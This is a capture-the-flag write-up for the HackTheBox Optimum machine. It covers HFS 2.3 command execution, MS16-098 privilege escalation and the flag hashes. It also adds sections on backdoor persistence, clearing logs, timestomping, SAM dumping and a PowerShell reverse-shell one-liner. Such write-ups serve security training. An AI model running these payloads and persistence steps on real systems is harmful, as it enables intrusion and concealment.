Post

HackTheBox Optimum

Writeup for HackTheBox Optimum

HackTheBox Optimum

Machine Synopsis

Key Exploitation Techniques:

  • HttpFileServer (HFS) version identification and exploitation
  • Remote code execution via CVE-2014-6287
  • Windows kernel privilege escalation (MS16-098)
  • File transfer techniques for exploit delivery

Reconnaissance & Enumeration

Port Discovery

1
2
3
$ nmap -p- --min-rate 10000 10.10.10.8
PORT   STATE SERVICE
80/tcp open  http

Service Enumeration

1
2
3
4
5
6
$ nmap -p 80 -sC -sV 10.10.10.8
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Web Application Analysis

Accessing http://10.10.10.8 reveals HttpFileServer 2.3 with a file browser interface.

Website

1
2
3
4
5
6
7
8
# Check for known vulnerabilities
$ searchsploit hfs 2.3
-------------------------------------------------------- ---------------------------------
 Exploit Title                                          |  Path
-------------------------------------------------------- ---------------------------------
HFS Http File Server 2.3.x - Remote Command Execution | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command | windows/remote/39161.py
-------------------------------------------------------- ---------------------------------

Exploitation

CVE-2014-6287 Analysis

HttpFileServer 2.3 contains a remote command execution vulnerability in the search functionality. The vulnerability exists in the findMacroMarker function where user input is processed without proper sanitization.

Exploit Execution

1
2
3
# Copy the Python exploit
$ searchsploit -m 39161
$ cat 39161.py

The exploit requires hosting nc.exe for downloading and executing on the target:

1
2
3
4
5
6
7
8
9
10
# Setup web server for nc.exe
$ locate nc.exe
/usr/share/windows-resources/binaries/nc.exe
$ cp /usr/share/windows-resources/binaries/nc.exe .
$ python3 -m http.server 80

# Setup netcat listener
$ nc -nlvp 443
# Execute the exploit
$ python 39161.py 10.10.10.8 80

Initial Shell Access

C:\Users\kostas\Desktop> whoami
optimum\kostas

C:\Users\kostas\Desktop> type user.txt
d0c39409d7b994a9a1389ebf38ef5f73

Privilege Escalation

System Information Gathering

C:\Users\kostas\Desktop> systeminfo
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 31 Hotfix(s) Installed.

Vulnerability Assessment

1
2
3
4
5
# Use Windows Exploit Suggester
$ python windows-exploit-suggester.py --database 2021-05-16-mssb.xlsx --systeminfo systeminfo.txt

[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*]   https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)

MS16-098 Exploitation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# Download pre-compiled exploit
$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

# Host exploit for download
$ python3 -m http.server 80
# Download and execute exploit
C:\Users\kostas\Desktop> powershell wget "http://10.10.14.4/41020.exe" -outfile "exploit.exe"
C:\Users\kostas\Desktop> exploit.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop> whoami
nt authority\system

C:\Users\kostas\Desktop> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> type root.txt
51ed1b36553c8461f4552c2e92b3eeed

Post-Exploitation Techniques

Persistence Methods

Registry Persistence

1
2
3
4
5
6
7
8
9
10
11
12
13
# Create backdoor payload
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe -o backdoor.exe

# Transfer to target
$ python3 -m http.server 80
# Download backdoor on target
C:\Users\kostas\Desktop> powershell wget "http://10.10.14.4/backdoor.exe" -outfile "C:\Windows\System32\backdoor.exe"

# Add registry auto-start entry
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Updater" /t REG_SZ /d "C:\Windows\System32\backdoor.exe"

# Verify persistence
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Updater"

Service Installation

# Create persistent service (using the same backdoor.exe created above)
sc create "SecurityUpdate" binpath= "C:\Windows\System32\backdoor.exe" start= auto
sc start "SecurityUpdate"
sc query "SecurityUpdate"

# Setup handler for backdoor connections
# On attacking machine:
$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.4
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit

Scheduled Task

# Create system startup task (using the same backdoor.exe)
schtasks /create /tn "SecurityUpdate" /tr "C:\Windows\System32\backdoor.exe" /sc onstart /ru SYSTEM
schtasks /query /tn "SecurityUpdate"

# Test scheduled task execution
schtasks /run /tn "SecurityUpdate"

Defense Evasion

Log Cleanup

# Clear Windows Event Logs
for /f "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

# Clear PowerShell history
del "%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"

# Clear IIS logs if present
del "C:\inetpub\logs\LogFiles\W3SVC1\*.log"

File Attribute Manipulation

# Hide backdoor files
attrib +h +s C:\Windows\System32\backdoor.exe
attrib +h +s C:\Windows\Temp\exploit.exe

# Timestomp files to match system files
powershell "(Get-Item C:\Windows\System32\backdoor.exe).LastWriteTime = (Get-Item C:\Windows\System32\kernel32.dll).LastWriteTime"

Lateral Movement Preparation

Network Discovery

# Discover network hosts
for /L %i in (1,1,254) do @ping -n 1 -w 100 10.10.10.%i > nul && echo 10.10.10.%i is alive

# Port scanning
powershell "1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect('10.10.10.1',$_)) \"Port $_ is open\"} 2>$null"

Credential Harvesting

# Dump SAM database
reg save HKLM\SAM C:\Windows\Temp\sam
reg save HKLM\SYSTEM C:\Windows\Temp\system

# Search for stored credentials
cmdkey /list

WMI Remote Execution

# Execute commands remotely (if credentials available)
wmic /node:"target_ip" /user:"domain\username" /password:"password" process call create "cmd.exe /c command"

Alternative Exploitation Methods

Manual HFS Exploitation

1
2
3
4
5
# Manual command execution via URL encoding
curl "http://10.10.10.8/?search=%00{.exec|cmd.exe /c whoami.}"

# Download and execute payload
curl "http://10.10.10.8/?search=%00{.exec|cmd.exe /c powershell -c \"(new-object System.Net.WebClient).DownloadFile('http://10.10.14.4/nc.exe','C:\\Windows\\Temp\\nc.exe'); C:\\Windows\\Temp\\nc.exe -e cmd.exe 10.10.14.4 443\".}"

PowerShell Reverse Shell

# PowerShell one-liner reverse shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Alternative Privilege Escalation

Watson Enumeration

1
2
3
# Use Watson for privilege escalation identification
Invoke-WebRequest -Uri "http://10.10.14.4/Watson.exe" -OutFile "C:\Windows\Temp\Watson.exe"
C:\Windows\Temp\Watson.exe

PowerUp Enumeration

1
2
3
4
# Use PowerUp for privilege escalation vectors
powershell -ep bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks

This post is licensed under CC BY 4.0 by the author.